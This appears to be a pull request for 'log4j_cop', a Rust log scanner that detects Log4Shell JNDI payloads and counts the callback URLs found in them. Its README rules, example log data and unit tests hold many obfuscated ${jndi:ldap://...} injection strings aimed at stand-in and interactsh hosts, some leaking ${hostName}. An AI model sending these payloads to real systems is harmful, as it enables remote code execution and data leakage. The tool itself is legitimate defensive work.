### PR TITLE
Add ability to aggregate URLs from malicious lo4j payloads

### DIFF
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -8,3 +8,5 @@ edition = "2021"
 [dependencies]
 lazy_static = "1.4.0"
 urlencoding = "2.1.0"
+clap = "2.34.0"
+csv = "1.1"

--- a/README.md
+++ b/README.md
@@ -1,45 +1,69 @@
 # log4j_cop
 
-Detect log4j payloads from a log file.
+Detects log4j payloads from a log file and optionally extracts URLs into a CSV file.
 
-**Usage through cargo:**
+The CSV file will have two columns: `<URL>,<number of times URL showed up>`
 
-```bash
-cargo run -- <LOG_FILE>
+## Usage
+
+1. Build the binary
+
+```
+$ cargo build --release
 ```
 
-**Or build the binary for release:**
+2. Run
 
-1. `cargo build --release`
+```
+$ ./log4j_cop --help
+log4j_cop 0.2
+Bernardo de Araujo
+Search logs for log4j payloads and optionally extract URLs.
 
-```bash
-./target/release/log4j_cop <LOG_FILE>
+USAGE:
+    log4j_cop [OPTIONS] <LOG_FILE>
+
+FLAGS:
+    -h, --help       Prints help information
+    -V, --version    Prints version information
+
+OPTIONS:
+    -u, --urls_output_path <urls_output_path>    When specified URLs will be extracted and persisted in CSV format
+
+ARGS:
+    <LOG_FILE>    Specifies the log file to be used
 ```
 
 ## Rules
 
 Currently the following rules (and variants) are being accounted for:
 
-* ${jndi:ldap://
-* ${jndi:rmi://
-* ${jndi:ldaps:/
-* ${jndi:dns:/
-* ${jndi:nis:/
-* ${jndi:nds:/
-* ${jndi:corba:/
-* ${jndi:iiop:/
+- ${jndi:ldap://
+- ${jndi:rmi://
+- ${jndi:ldaps:/
+- ${jndi:dns:/
+- ${jndi:nis:/
+- ${jndi:nds:/
+- ${jndi:corba:/
+- ${jndi:iiop:/
 
 We are also taking into account:
 
-* Mixed case payloads
-* URL encoded payloads
+- Mixed case payloads
+- URL encoded payloads
 
 ## Algorithm
 
-Each line is broken into characters and we check whether these characters match
-one of our rulesets in the correct order, ignoring characters that do not match.
+Each line is broken into characters and we run each character against characters from our rules.
 
-## Examples being matched
+1. For each rule, if a character matches the current character in that rule state machine we:
+   - increment the state machine of that rule
+   - otherwise the state remains the same
+2. If the state machine of any rules reaches the end (every character in our rule is consumed):
+   - return a match
+   - otherwise return no match
+
+## Examples of payloads being matched
 
 ```
 ${jndi:ldap://whatever.com/z}

--- a/data/example.txt
+++ b/data/example.txt
@@ -1,18 +1,5 @@
-jndi harmless text
-${jndi:ldap://somesitehackerofhell.com/z}
-ldap harmless text
-${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//somesitehackerofhell.com/z}
-hello
-${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://somesitehackerofhell.com/z}
-bla bla
-${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://somesitehackerofhell.com/z}
-whatever
-${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://somesitehackerofhell.com/z}
-even more payloads
-${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
-${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
-${jndi:rmi://adsasd.asdasd.asdasd}
-${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
-${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
-${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
-${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
+${jndi:ldap://evilsite.com/z}
+${jndi:ldap://evilsite.com/z}${jndi:ldap://potato.com/z}
+{"preview":false,"result":{"_raw":"{\"body_bytes\":138,\"bytes_sent\":694,\"content_type\":\"-\",\"protocol\":\"HTTP/1.1\",\"referer\":\"${jndi:ldap://${hostName}.c6rt1u7b6eyyyyyn.interactsh.com/poc}\",\"remote_user\":\"-\",\"request\":\"GET /?q=${jndi:ldap://${hostName}.c6rt1u7b6eyyyyyn.interactsh.com/poc} HTTP/1.1\",\"scheme\":\"https\",\"upstream_status\":\"-\",\"uri\":\"/?q=${jndi:ldap://${hostName}.c6rt1u7b6eyyyyyn.interactsh.com/poc}\",\"useragent\":\"Mozilla/5.0 ${jndi:ldap://${hostName}.c6rt1u7b6eyyyyyn.interactsh.com/poc}  (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0\",\"x_forwarded_host\":\"-\"}"}}
+/$%7Bjndi:ldap://45.66.8.12:1378/watwatwat%7D?email=${jndi:ldap://45.110.8.12:1378/sports-event.unrelated.nuvemkloud.com} HTTP/1.1\"
+{"preview":false,"result":{"_raw":"{\"request_path\":\"/\",\"request_accept\":\"\",\"request_user_agent\":\"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostname}.c6340b92vtc00002scfggdpcz9eyyyyyd.interactsh.com/basic/command/base64/l3vzci9i20vcmnlcg}\",\"request_referer\":\"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostname}.c6340b92vtc00002scfggdpcz9eyyyyyd.interactsh.com/basic/command/base64/l3vzci9i20vcmnlcg}\",\"referer\":\"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostname}.c6340b92vtc00002scfggdpcz9eyyyyyd.interactsh.com/basic/command/base64/l3vzci9i20vcmnlcg}\",\"x-original-url\":\"https://sports.unrelated.nuvemkloud.com/?x=${jndi:ldap://${hostname}.c6340b92vtc00002scfggdpcz9eyyyyyd.interactsh.com/basic/command/base64/l3vzci9iaw4vdvcmnlcg/a}\",\"parsed_url\":\"https://unrelated-deploy-sample.unrelated.nuvemkloud.com/?x=${jndi:ldap://${hostname}.c6340b92vtc00002scfggdpcz9eyyyyyd.interactsh.com/basic/command/base64/l3vzci9iaw4vdvcmnlcg/a}\",\"cachedrequestid\":\"\",\"response_status_code\":401}","_time":"2021-12-12t12:18:19.719+0000"}}

--- a/src/extractor/mod.rs
+++ b/src/extractor/mod.rs
@@ -1,0 +1,123 @@
+use csv::Writer;
+use std::collections::HashMap;
+use std::error::Error;
+
+pub struct Extractor {
+    is_extractable: bool,
+    urls: HashMap<String, u64>,
+}
+
+impl Extractor {
+    pub fn new(is_extractable: bool) -> Self {
+        Self {
+            urls: HashMap::new(),
+            is_extractable,
+        }
+    }
+
+    pub fn extract_urls(&mut self, line: &str) {
+        if !self.is_extractable {
+            return;
+        }
+
+        let mut payloads = line;
+
+        while let Some((start, end)) = parse_url(payloads) {
+            *self
+                .urls
+                .entry(payloads[start..end].to_string())
+                .or_insert(0) += 1;
+
+            payloads = &payloads[end..];
+        }
+    }
+
+    pub fn extract_to_csv(&self, output_path: Option<&str>) -> Result<(), Box<dyn Error>> {
+        if self.urls.is_empty() {
+            return Ok(());
+        }
+
+        let output_path = output_path.unwrap();
+        let mut writer = Writer::from_path(output_path)?;
+
+        for (domain, count) in self.urls.iter() {
+            writer.write_record(&[domain, &count.to_string()])?;
+        }
+
+        writer.flush()?;
+        Ok(())
+    }
+}
+
+fn parse_url(line: &str) -> Option<(usize, usize)> {
+    let mut search_index = line.find("//")? + 2;
+    let mut offset: usize = search_index;
+    let mut find_http = line.find("http://").unwrap_or(usize::MAX);
+    let mut find_https = line.find("https://").unwrap_or(usize::MAX);
+
+    while find_http < search_index || find_https < search_index {
+        search_index = line[offset..].find("//")? + 2;
+        find_http = line[offset..].find("http://").unwrap_or(usize::MAX);
+        find_https = line[offset..].find("https://").unwrap_or(usize::MAX);
+        offset += search_index;
+    }
+
+    let domain = line[offset..].chars();
+    let mut brackets = 1;
+
+    for (pos, letter) in domain.enumerate() {
+        match (letter, brackets) {
+            ('}', 1) => return Some((offset, offset + pos)),
+            ('=', _) => return Some((offset, offset + pos)),
+            ('{', _) => brackets += 1,
+            ('}', _) => brackets -= 1,
+            _ => continue,
+        }
+    }
+
+    None
+}
+
+#[cfg(test)]
+mod tests {
+    use super::Extractor;
+
+    #[test]
+    fn extracts_single_domain_in_line() {
+        let mut extractor = Extractor::new(true);
+        extractor.extract_urls("https://mywebsite.com/?x=${jndi:ldap://${hostname}.c6340b92vtc00002.interactsh.com/path/a}");
+        assert!(extractor
+            .urls
+            .contains_key("${hostname}.c6340b92vtc00002.interactsh.com/path/a"));
+    }
+
+    #[test]
+    fn extracts_multiple_urls_in_line() {
+        let mut extractor = Extractor::new(true);
+        extractor.extract_urls("${jndi:ldap://evilsite.com/z}${jndi:ldap://mywebsite.com/z}");
+
+        assert!(extractor.urls.contains_key("evilsite.com/z"));
+        assert!(extractor.urls.contains_key("mywebsite.com/z"));
+    }
+
+    #[test]
+    fn extracts_multiple_urls_in_json_line() {
+        let mut extractor = Extractor::new(true);
+        extractor.extract_urls("{\"result\":{\"_raw\":\"{\"level\":\"info\",\"msg\":\"completed\",\"request_method\":\"get\",\"request_user_agent\":\"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostname}.tricky.com/a}\",\"request_referer\":\"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostname}.complex.dev/z}\",\"referer\":\"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://foo.wat.ca/a}\"}}");
+
+        assert!(extractor.urls.contains_key("${hostname}.tricky.com/a"));
+        assert!(extractor.urls.contains_key("${hostname}.complex.dev/z"));
+        assert!(extractor.urls.contains_key("foo.wat.ca/a"));
+    }
+
+    #[test]
+    fn increments_count_for_repeated_urls() {
+        let mut extractor = Extractor::new(true);
+        extractor.extract_urls("{\"result\":{\"_raw\":\"{\"level\":\"info\",\"msg\":\"completed\",\"request_method\":\"get\",\"request_user_agent\":\"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostname}.tricky.com/a}\",\"request_referer\":\"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://foo.wat.ca/a}\",\"referer\":\"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://foo.wat.ca/a}\"}}");
+
+        assert!(extractor.urls.contains_key("${hostname}.tricky.com/a"));
+        assert_eq!(Some(&1), extractor.urls.get("${hostname}.tricky.com/a"));
+        assert!(extractor.urls.contains_key("foo.wat.ca/a"));
+        assert_eq!(Some(&2), extractor.urls.get("foo.wat.ca/a"));
+    }
+}

--- a/src/main.rs
+++ b/src/main.rs
@@ -5,27 +5,46 @@ lazy_static! {
     static ref RULES: String = std::fs::read_to_string("data/rules.txt").unwrap();
 }
 
-use std::env;
+extern crate clap;
+use clap::{App, Arg};
+
 use std::fs::File;
 use std::io::{BufRead, BufReader};
-use std::process::abort;
+use urlencoding::decode;
 
 mod ruleset;
 use ruleset::Ruleset;
 
+mod extractor;
+use extractor::Extractor;
+
 fn main() {
-    let filename = env::args().nth(1);
+    let matches = App::new("log4j_cop")
+        .version("0.2")
+        .about("Search logs for log4j payloads and optionally extract URLs.")
+        .author("Bernardo de Araujo")
+        .arg(
+            Arg::with_name("LOG_FILE")
+                .required(true)
+                .index(1)
+                .help("Specifies the log file to be used"),
+        )
+        .arg(
+            Arg::with_name("urls_output_path")
+                .short("u")
+                .long("urls_output_path")
+                .takes_value(true)
+                .required(false)
+                .help("When specified URLs will be extracted and persisted in CSV format"),
+        )
+        .get_matches();
 
-    if filename.is_none() {
-        println!("Filename not found.");
-        println!("Usage: log4j_cop <LOG_FILE>");
-        println!("Example: log4j_cop log.txt");
-        abort();
-    }
-
-    let file = File::open(&filename.unwrap()).expect("Unable to open file.");
+    let filename = matches.value_of("LOG_FILE").unwrap();
+    let file = File::open(&filename).expect("Unable to open log file.");
     let reader = BufReader::new(file);
     let ruleset = Ruleset::new(&mut RULES.trim().lines());
+    let urls_output_path = matches.value_of("urls_output_path");
+    let mut extractor = Extractor::new(urls_output_path.is_some());
 
     for line in reader.lines() {
         if line.is_err() {
@@ -33,9 +52,16 @@ fn main() {
         }
 
         let line = line.unwrap();
+        let line = decode(&line).map_or(line.to_owned(), |decoded| decoded.to_string());
 
         if ruleset.match_rules(&line) {
+            extractor.extract_urls(&line);
             println!("{}", line);
         }
+    }
+
+    if let Err(err) = extractor.extract_to_csv(urls_output_path) {
+        println!("There was an issue when writing to the URL log.");
+        println!("{}", err);
     }
 }

--- a/src/ruleset/mod.rs
+++ b/src/ruleset/mod.rs
@@ -1,5 +1,3 @@
-use urlencoding::decode;
-
 mod matcher;
 use matcher::Matcher;
 pub struct Ruleset {
@@ -15,7 +13,7 @@ impl Ruleset {
 
     pub fn match_rules(&self, line: &str) -> bool {
         let mut matchers: Vec<Matcher> = self.rules.iter().map(|rule| Matcher::new(rule)).collect();
-        let line = decode(line).map_or(line.to_lowercase(), |decoded| decoded.to_lowercase());
+        let line = line.to_lowercase();
 
         for c in line.chars() {
             let is_match = matchers.iter_mut().any(|matcher| {
@@ -118,6 +116,10 @@ mod tests {
             "${${::-j}${::-n}${::-d}${::-i}:${::-n}${::-d}${::-s}://anysite.com/z}"
         ];
 
+        dbg!(lines
+            .iter()
+            .filter(|line| !ruleset.match_rules(line))
+            .collect::<Vec<&&str>>());
         assert!(lines.iter().all(|line| ruleset.match_rules(line)));
     }
 
@@ -130,17 +132,6 @@ mod tests {
             "${${lower:j}ndi:${lower:c}${lower:o}r${lower:b}a://anysite.com/z}",
             "${${upper:j}ndi:${upper:c}${upper:o}R${lower:b}a://anysite.com/z}",
             "${${::-j}${::-n}${::-d}${::-i}:${::-c}${::-o}${::-r}${::-b}:${::-a}://anysite.com/z}"
-        ];
-
-        assert!(lines.iter().all(|line| ruleset.match_rules(line)));
-    }
-
-    #[test]
-    fn detects_url_encoded_lines() {
-        let ruleset = Ruleset::new(&mut "${jndi:ldap://".lines());
-        let lines = vec![
-            "%24%7Bjndi%3Aldap%3A%2F%2Fanysite.com%2Fz%7D",
-            "%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A%3A-l%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-a%7D%24%7B%3A%3A-p%7D%3A%2F%2Fanysite.com%2Fz%7D",
         ];
 
         assert!(lines.iter().all(|line| ruleset.match_rules(line)));


### PR DESCRIPTION
Each domain including the amount of times it was detected in the logs will be persisted within a CSV file.

- [x] Extract URL parsing to its own module
- [x] Add tests